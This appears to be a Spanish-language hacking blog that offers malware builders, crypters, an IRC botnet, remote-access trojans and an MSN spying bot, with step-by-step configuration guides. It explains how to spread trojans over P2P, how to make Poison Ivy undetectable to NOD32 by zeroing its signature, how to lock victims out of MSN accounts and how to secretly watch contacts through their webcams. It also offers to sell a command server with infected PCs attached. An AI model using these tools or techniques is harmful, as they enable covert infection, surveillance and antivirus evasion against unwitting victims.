JPS Virus Maker 3.0

JPS es otro generador de virus parecido al Terabit, solo que tiene algunas caracteristicas extras.
Esto es muy facil de usar, marcan todo lo que quieren que haga el virus, elijen un nombre, ponen create virus y listo ya tienen un virus creado por ustedes listo para enviar.

AL DESCARGAR EL ARCHIVO ME SALTARON LOS AVS DICIENDO QUE ERA UN BACKDOOR, LO ESCANIE EN ANUBIS Y AL PARECER NO TIENE NADA, RECOMIENDO CREAR LOS VIRUS EN UNA MAQUINA VIRTUAL, NO ESTOY DEL TODO SEGURO DE QUE ESTA LIMPIO EL ARCHIVO, AUNQUE LA DESCARGA ES DE LA PAGINA OFICIAL.

Descarga:
JPS Virus Maker 3.0 (pagina oficial)

Poison ivy 2.3.2 y P2P: Una buena combinacion

La propagacion por P2P es una de las mas efectivas para propagar un troyano masivamente, en este video se puede ver un cliente del poison ivy completo con 200 conectados, y ademas hay mas de 1000 conexiones en espera para conectarse entre los 2 puertos.

Para propagar por P2P lo unico que tienen que hacer es juntar el server de su poison (indetectable preferentemente), con algun archivo que la gente baje mucho del ares y despues compartirlo.
Lo demas se las ingenian ustedes, no les voy a decir mis secretos.

Asi que ya saben, si no quieren que su pc aparezca en la segunda version del video, no descaguen ejecutables o comprimidos del ares, aunque tengan todos los antivirus, jajaja.

La cuenta cdmon a donde se conectan todas las pcs sera subastada desde 200 euros, si la quieren comprar me escriben en la pagina de contacto

VirtualBox 1.5.6

VirtualBox es un software de virtualización que nos permite ejecutar distintos sistemas operativos como Windows, Linux, Mac OS X, OS2 dentro de nuestro O.S. actual.
Esta aplicación, además de ser software libre, es ideal para testear nuevos sistemas operativos sin tener que molestarnos en crear particiones, modificar el MBR, o sufrir cualquier otro problema relacionado con nuestro disco rígido. VirtualBox también posee algunas caracteristicas extras como: Controladores USB Virtuales, Carpetas Compartidas, posibilidad de configurar un servidor remoto con el protocolo RDP, etc.

Virtual box en troyanos y virus

Algunos de los usos que se le dan a una pc virtual en este ambito son los siguientes:

-Testear que tan indetectable son nuestros server de troyanos, keylogger o virus.
Es lo mejor que pueden tener para esto, por 3 motivos:
El primero es que las muestras no se envian a los laboratorios de los antivirus, por lo tanto si tienen un server indetectable solo para ustedes, mientras los testeen en su maquina virtual estara seguro e indetectable por muchisimo tiempo.
El segundo motivo es que se pueden tener multiples antivirus, o multiples pc virtuales con distintos SO, pueden tener combos de antivirus, por ejemplo AVG, nod32 panda y avast en una pc con win XP, y en otra pc pueden tener Kaspersky, antivir, norton y bitdefender con win Vista, etc.
El tercer motivo es que los server se escanean durante la ejecucion tambien (MUY importante), quiere decir que al ejecutar el archivo infectado alertara o no el antivirus, porque suele pasar muchas veces que el antivirus no detecta ningun virus cuando se lo escanea con VT o paginas similares, o tambien con programas como el scanlix o el kims, Pero resulta que al ejecutar el archivo salta el antivirus alertando que el archivo esta infectado.

En la imagen pueden ver al AVG KAV y nod32 corriendo al mismo tiempo, ninguno detecto mi virus con el kims pero al ejecutarlo salto el AVG y borro el virus.

-Testear troyanos, bots, keylogger, virus, encriptadores infectados, etc.
Podemos testear si esta bien creado el server de nuestro troyano, si funciona el keylogger o los distintos tipos de bot.
Podemos testear virus para ver si en verdad funcionan, y si hacen su trabajo, para que probarlo en nuestra pc o en alguna victima si lo podemos probar en una pc virtual y ver en tiempo real el daño que hace sin tener que preocuparse por nuestra pc.
Tambien sirve para testear encriptadores, binder, joiner o distintas herramientas que pensemos que estan infectadas o que puedan dañar nuestro equipo.
Y algo tambien muy importante es que nos sirve para testear distinto malware en distintos SO, por ejemplo podemos provar si nuestro bifrost funciona en Vista, y nos daremos cuenta de que si funciona pero que no funciona el keylogger, entonces probamos algun keylogger y nos damos cuenta de que el de prohide si funciona XD.

Para instalar un sistema operativo necesitan un cd booteable o sino una .iso, Proximamente posteare un manual, tambien pueden probar vmware que no es libre, pero es muy buena.

VirtualBox 1.5.6-1 Win x86.msi (windows)
VirtualBox 1.5.6-1 Linux x86.run (linux)
VirtualBox 1.5.6 (todas las plataformas)

AR crypt private

Ar crypt es un encriptador privado scantime que deja los archivos encriptados 100% indetectable a los antivirus, los encriptadores scantime solo encriptan durante el escaneo, no durante la ejecucion (runtime), osea que si lo escanean con cualquier antivirus le saldra que el archivo no contiene virus, pero al ejecutarlo el antivirus dara la alerta.
Esto puede ser util para enviar por mail archivos muy detectados por los avs de hotmail o gmail como el bifrost, pero para lo que mas se usa es para encriptar avkillers u otra clase de virus, no es muy recomendado para troyanos.

Esta herramienta es unica y exclusiva de troyanosyvirus asi que no lo suban a VT, ni a ninguna de esas paginas, depende de nosotros de cuanto durara esta herramienta, si dura menos de 2 semanas hare una seccion VIP para descargar este tipo de programas y se soluciona todo.

Descarga:
AR crypt private (mediafire)
AR crypt private (rapidshare)

Brainbot V1.5

A pedido de los usuarios posteo este bot, es muy facil de configurar y es bastante estable, es con el bot que yo empese.
Una de sus mejores caracteristicas es su propia propagacion, tiene propagacion por p2p, irc, lan, y sql.
Incluye un binder, un compresor upx, posibildad de cambiar el icono y metodos de inicio.

Explico un poco como se configura:

Irc server:Aqui colocamos la direccion del servidor irc que utilizemos, recomiendo utilizar una cuenta no-ip o cdmon que redireccione al servidor para no perder los bot por si cierran el servidor o los banean, generalmente los banean muy rapido si tienen muchos bots, pueden buscar servidores irc en google.

Irc port: El puerto del servidor irc, generalmente 6667

Channel: Pongan el canal donde se conectaran los bot, por ejemplo #botnet

Fixed name: Los nick que tendran los bot cuando se conecten al servidor, por ejemplo Bot-

Masternick:
Esto es importante, es el nick que usaran ustedes para conectarse, es el que deben seleccionar en el cliente irc, si no se conectan con ese nick los bot no les daran bola. Ej: mauro892

Password: Su pasword para conectarse, es el que usaran para conectarse cuando introduscan el comando !login. Ej: 123465

Bind file: Seleccionamos el archivo con el que queremos juntar el bot, por ejemplo una foto.

Change icon: Seleccionamos el icono del bot, por ejemplo el de una imagen jpg

Upx: Marcamos para comprimir el bot

Startup: Introduciomos un nombre para una clave de registro (por ejemplo winr32), y el nombre del ejecutable para instalar en la carpeta de win (ej bootload)

Eso es todo lo basico para que el server funcione, ahora le damos build y a infectar, Despues explicare los metodos de spread para que el bot se propague.

Para ver los comandos del bot introducen !commands, en el cliente irc.
Tambien pueden leer el readme del archivo para ver las caracteristicas del bot, y para ver mas detalladamente como se introducen los comandos.
si tienen alguna duda con respecto a los comandos lo comentan aca y les contesto.

Descarga:
Brainbot V1.5 (megaupload)
Brainbot V1.5 (rapidshare)
Brainbot v1.5 (trojanfrance, sin dependencias)

Small Crypter by E0N

Small Crypter es un crypter tanto scan-time como run-time que utiliza inyección. Su stub está escrito en asm y un poco retocado a mano, por lo que solamente ocupa 1.3 KB. ¿Qué quiere decir esto? Pues quiere decir que si encriptamos un ejecutable con Small Crypter el tamaño total del mismo solo aunmentará en 1.3KB, es decir, prácticamente nada
Por poner un ejemplo, al encriptar el server del Poison Ivy con Small Crypter el server final solo ocupará 6.6KB.

Testeado con poison ivy 2.3.2 en maquina virtual con avg, nod32 y kav actualizados, se los saltea a todos.

Descarga:
Small Crypter
Small Crypter

Chau MSN v1.0 OPEN SOURCE

Chau MSN es un programa creado por arhack, basado en el source de kizar, lo que hace es bloquear cuentas de msn completamente mientras el programa este activo.

Para bloquear una cuenta lo unico que tienen que hacer es colocar el msn de la victima y poner bloquear cuenta, esperar que termine de cargar todo y dejarlo abierto al programa, o minimizado. La proxima ves que la victima intente entrar al msn le saldra un cartel como este, y no podra iniciar secion:

Hay que tener en cuenta que la cuenta permanesera bloqueada mientras el programa este abierto y en el estado cuenta bloqueada.
Si se intenta bloquear una cuenta de alguien que este online, esta se bloqueara pero cuando cierre secion y vuelva a iniciarla, No hara que cierre secion.

Funcionamiento
El funcionamiento del programa es muy simple, lo que se hace es loguearse con la cuenta que se puso con passwords incorrectos, entonces el servidor de hotmail bloquea la cuenta para evitar que se realizen ataques por fuerza bruta.

ACTUALIZADO 16/04/08

Codigo fuente
Chau MSN esta programado en visual basic y es de codigo abierto desde ahora, ya libere el codigo fuente para que vean como funciona mas o menos y para todos los que quieran modificar el programa. Pueden ir haciendo las modificaciones que quieran y me lo van pasando asi voy actualizando el programa, no nesesariamente tiene que bloquear cuentas.

Les dejo una captura del VB

Descarga:
Chau MSN v1.0 (miarroba)
Chau MSN v1.0 (rapidshare)
Chau MSN v1.0 (megaupload)

Source Chau MSN v1.0 (miarroba)
Source Chau MSN v1.0 (rapidshare)

SB-MSN 1.0

Les presento este programita nuevo creado por octalh, basicamente sirve para espiar a tus contactos de msn, por ahora dispone de captura de webcam, sonido y pantalla de la pc remota, su uso es muy simple y no requiere de mapear puertos ni cosas extrañas ya que se conecta directamente desde el msn, ademas es indetectable a los avs y a los firewalls... abajo de la imagen les dejo la descripcion original de octalh, y un pequeño manual hecho por mi de como se usa por si no lo entienden, de todos modos dentro de la descarga tienen un archivo con los comandos y demas.

SB-MSN Ver. 1.0 es un robot programado en Delphi que opera y realiza acciones interpretando comandos vía MSN Messenger a través de una charla de conversación. Por ahora cuenta con pocos comandos pero con el transcurso del proyecto se añadirán nuevas funcionalidades.
SB-MSN Ver. 1.0 por ahora solo cumple funciones de vigilancia como espectador en el equipo remoto, por lo que aun no podría considerarse un software de administración remota.

Que hace especial a SB-MSN?
Debido a que no requiere de un protocolo extra ni una conexión cliente-servidor externa a MSN Messenger, no requieres de ningún tipo de cliente espacial, únicamente tener una cuenta de correo en MSN y escribir los comandos en una ventana de conversación, por lo que lo convierte en un cliente Multiplataforma.
También tiene la habilidad de burlar el FW ya que no conecta a ningúna otra IP externa excepto a los servidores de MSN donde se lleva acabo dicha conversación con el BOT.
SB-MSN Ver. 1.0 Trabaja utilizando el API de MSN , y la interpretación de comandos tiene que delimitarse con prefijos para el inicio y el final del comando.

Como se usa?
Facil, primero abrimos el editor dsb-msn y lo configuramos, en donde dice correo electronico ponemos nuestro correo electronico, tiene que ser de hotmail, despues ponemos aceptar y seleccionamos el server que venia en el archivo, obiamente despues le cambian el nombre lo juntan con una imagen o le cambian el icono, ustedes se las ingenian.
Despues le enviamos ese server a algun contacto del msn (preferentemente alguna mina que este buena y que tenga web cam jaja).
Una vez que nuestro contacto ejecute el server nos colocamos en estado "sali a comer" y lo saludamos al bot (hay que ser educados), escribimos el siguiente comando en la ventana de chat ./hola/. y nos debe responder, por lo tanto el bot funciona, su contacto no vera lo que escriben mientras esten en el estado "sali a comer", asi que no se preocupen.
Ahora iniciamos una videollamada, para ello escribimos ./videollamada/. y nos aparece si desamos aceptar o rechazar, aceptamos y podremos escuchar y ver a nuestro contacto, el no se enterara de nada hasta que cambiemos nuestro estado.
Para recivir una captura escriben ./pantalla/. y se les enviara un archivo con una captura de pantalla.
Para cerrar la secion con el bot ponene ./adios/. y podran seguir chateando con su contacto.
Cuando quieran borrar el bot ponen ./suicidio/. y listo los devolvera a su estado de conectado y el bot se habra borrado.

Descarga:
SB-MSN 1.0 (rapidshare)
SB-MSN 1.0 (megaupload)

Shark 3.1 Fixed

Ya salio la version 3.1 del troyano shark, la ultima conocida era la 3.0, que era bastante inestable y cuando se tenia muchas victimas se desconectaban por razones desconocidas, en esta version se soluciono eso, ademas de ocultarse mas, para que sea mas dificil encontrarlo y borrarlo, por ahora es mas indetectable que la anterior, y tiene algunas pequeñas caracteristicas nuevas.

Changes
* Server-Summary had a mistake
* Client now uses Double-Variable Type for calculating Idletime
* Statistics Window not resizeable anymore
* Server-Auth-Window had an old sharK icon
* DOS Shell will be started automatically (when auto-refresh is activated)
* ADS is no longer set as default install folder since the installation routine needs more time
* RegExport & Plugin Installation working with Createprocess instead of shell() -> Faster!
* Plugin Uninstalling is way faster
* Faster File/Registry Listing
* Fixed some typos
* sharK Autosizes Columnheaders
* Regstartup-Resetting is more aggressive
* Server did not reconnect some times when disconnecting from the internet
* Some little changes
* sharK offline keylogger not noticeable anymore by lagging keyboards
* Added few idiotchecks (e.g. Servername Restriction)
* Faster GUI
* Renamed "Autostart Manager" -> "Startup Manager" and moved to "SYSTEM" menu
* Confirmation box before client exit
* Tr Queue has Minimize Button
* Better Ping Handling

Bug Fixes
* Sleep until next reboot now working
* Shark sometimes removed too many startup entries
* Fixed ShellWait() Routine -> Wait_For_Files_Termination (Server File Binder) is now working
* sharK adds Hash-Value of Path into Thumbpreview-Files for prevent problems with equal filenames
* shark crashed when making SIN Window too small
* sharK didn't list installed apps when Distributor, Version or Uninstallstring is missing
* Little fix in Pluginsystem
* Fixed Bug in Modulelisting/Pluginuploading
* 3.0 Servers are not updateable when having spaces in path

New Features
+ sharK shows total queued files/size in transfer queue + total ETA; transfer queue smaller sized
+ Memory Injection in Filebinder possible as Startmethod
+ You can move your transfer-items up/down in your queue
+ sharK uses Transfer-System for receiving keylogger-offlog -> VERY fast but not compatible to shark 3.0 server
+ You can hide the featurewindow taskbar
+ sharK will remove titlebar/form border when maximizing a feature window
+ sharK re-sets periphery blocks each 200ms when suspending/deactivating/locking stuff (e.g. keyboard) for prevent bypassing
+ Recoded Server installation part - MUCH faster installation!
+ You can capture only the foreground window optionally
+ Remote URL Monitor (Firefox, Netscape, Opera, Internet Explorer & Derivates)
+ Remote Clipboard Monitor
+ Keylogger seperates logs for each window
+ You can autosave the desk previews in the server folders
+ You can set "No Server Installation" in server builder
+ You can set "Also Start Server when installation fails" in server builder
+ You can see the desktop preview also in Report-Listview
+ Remote Chat Monitor (Working with: QIP, QIP Infium, Miranda, Miranda Me, ICQ Lite, ICQ6, Waste, Yahoo Msg, MSN 4)
+ Socks4 Reverse Proxy (STABLE! NO Beta anymore!)
+ Server will also start bound files when another server instance is already running
+ sharK does not use jpglib anymore, Pics are made smaller by setting BitsPerPixel --> Faster Screencap, Webcam Cam, Thumb & Preview Creation
+ You can set the remote clipboard
+ Serverprocess will be marked blue in Process/Open Port-List
+ You can sort almost every listview (asc & desc)
+ New Popup Style + Serverwindow will be opened on popup click
+ SharK now saves its settings via a configuration file, not via registry - old important settings are importable (port & password)
+ Profilesystem for Serverbuilder
+ Liteserver! (~600 Bytes)
+ sharK highlights own startup entry in Startup Manager
+ sharK does not connect all socket tunnels on connect. Only when opening the server window, shark will link the cam/screen/transfer socket
+ Startup Monitor: SharK servers will warn the clients when their startup entries are removed and aggressive mode is activated

Releases Notes
* Serversize: 168 KB (with fwb++, packed)
* Most Features are only working with a 3.1 server of course, some old features are not working on 3.0 servers due to syntax changes
* Due to massive changes, the sharK 3.1 client cannot interact anymore with shark 3.0.0 keyloggers
* The URL and Chat Monitor are unique features in a beta state. Wrong Results are possible.
* Due to the new connection system you can't use 3.1 servers with 3.0 clients

Descarga:
Shark 3.1 Fixed (pagina oficial)
Shark 3.1 Fixed (rapidshare)

Video: Dejando indetectable el poison ivy al nod32 con signaturezero

Introduccion:
En este video se ve como dejo un server puro del troyano poison ivy 2.3.2 indetectable al antivirus nod32 actualizado al dia.
El metodo que uso es uno de los mas faciles y rapidos, lo que realizo es buscar y encontrar la firma detectada por el antivirus con el signaturezero, reemplazando con ceros por partes el codigo hasta ayarla, una vez ayada la firma detectada exactamente, simplemente la reemplazo con ceros y el server queda indetectable al antivirus y totalmente funcional. Este metodo no requiere de edicion hexadecimal, cambios de flujo ni nada de eso, simplemente lo que se hace es borrar la firma, por lo tanto no funcionara con todos los troyanos ni con la mayoria de los encriptadores, porque romperian el archivo, si lo quieren terminar con cualquier encriptador o troyano pueden continuar leyendo el manual de Octalh (desde pag9).
Yo lo demostre con el poison ivy porque el tamaño de su server es muy pequeño y es rapido para encontrar las firmas, y utilize el nod32 porque es el antivirus que utilizo, pero un amigo lo probo con el KAV y funciona perfectamente (tienen que desactivar la inyeccion en la creacion del server para que no lo detecte la defensa proactiva de mierda)


Video:

Pasos que realize:
-Primero y principal exclui del nod32 la carpeta con la que voy a trabajar por el simple hecho de evitar que salte el cartelito diciendo que se encontro un virus cada vez que ejecuto el signaturezero, el poison ivy, los server, y demas.
-Descargue el poison ivy 2.3.2 y el signaturezero y los puse en la carpeta donde trabajare, anteriormente excluida con el nod32.
-Lo siguiente que realize fue crear el server del poison ivy 2.3.2 y lo coloque en la misma carpeta con el nombre SERVER.exe.
-Lo escanie con el nod32 y obiamente lo detectaba como troyano.
-Ejecute el siganturezero y abri el server que cree con el poison ivy (SERVER.exe)
-Rellene con ceros la parte de la derecha del server y guarde el archivo resultante con nombre "1" sin extencion.
-Abri el notepad para anotar los datos, en este caso anote 3498 que es hasta donde rellenare de ceros (no es nesesario, pero sirve para agilizar)
-Escanie el archivo "1" que guarde, con el nod32 y me aparecia que el archivo estaba infectado, lo que quiere decir que la firma que buscamos se encuentra del lado izquierdo, ya que no se relleno de ceros ese lado.
-Abri de vuelta el signaturezero, abri el server y rellene de ceros la parte izquierda del server desde 512 hasta 3498 y guarde el archivo como "2"
-Escanie el archivo "2" con el nod y me decia que el archivo estaba desinfectado, quiere decir que la firma se encuentra entre 512 y 3498.
-Despues avanze un poco hacia la izquierda, pase de 3498 a 2505, lleno de ceros guarde como "3" y analise el server: limpio, por lo tanto la firma se encuentra entre 512 y 2505.
-Seguidamente avanze hacia la derecha de 512 a 1287 lleno de ceros, guardo, analizo: server limpio, la firma se encuentra entre 1287 y 2505
-Avanzo hacia izquierda de 2505 a 2029, lleno, guardo, analizo, server limpio, la firma se encuentra entre 1287 y 2029
-Y haci sigo hasta que llego a llenar de ceros entre 1679 y 1777, guardo, analizo y me da que esta infectado, por lo tanto la firma no esta entre 1679 y 1777, por logica tiene que estar entre 1777 y 2029 y sigo el procedimiento.
-De esta manera sigo avanzando de izquierda a derecha e inversamente hasta llegar ayar la firma.
-Una vez allada la firma exacta (en mi caso esta entre 1971 y 1973), la relleno de ceros y guardo el archivo resultante con extencion .exe.

-Eso es todo ya tengo mi server del poison ivy indetectable al nod32 y pueden ver que funciona perfectamente.

Video:
Dejando indetectable el poison ivy al nod32 con signaturezero (online en flash)
Dejando indetectable el poison ivy al nod32 con signaturezero (descarga en wmv)

Descargas:
SignatureZero
Poison Ivy 2.3.2

Generador de worm en batch personalCAKE

PersonalCAKE es una version mejorada por Blu3 l0llip0p del famoso Generador de Worms 3sk0r8ut0 de hendrix.
Es ideal para infectar pcs masivamente, es totalmente indetectable y durara mucho tiempo sin que lo detecten ya que esta hecho en batch, a continuacion le detallo sus caracteristicas:

1. Propagacion por P2P
2. Mensage al iniciarse
3. Agregarse al Registro
4. Infectar archivos .rar
5. Borrar archivos
6. Manipular red LAN
7. Añadir Usuario y Pass
8. Copiarse y Ocultarse
9. Descargar archivo en la victima
10. Crear muchas carpetas en el HD de la victima
11. Apagar el PC de la victima en x segundos
12. Reiniciar el PC de la victima en x segundos
13. Incluir codigo de virus
14. Bloquear Crtl+Alt+Sup
15. Borrar AV
16. Informacion adicional
17. Salir

Usenlo con cuidado y bajo su propia responsabilidad, tengan en cuenta que se propaga muy rapidamente y por lo tanto se puede tornar incontrolable.

Descarga:
personalCAKE (rapidshare)
personalCAKE (megaupload)

Manual:
Manual del generador de Worms de Hendrix

Codigo fuente:
Source personalCAKE (desde el blog)
Source personalCAKE (descarga .txt)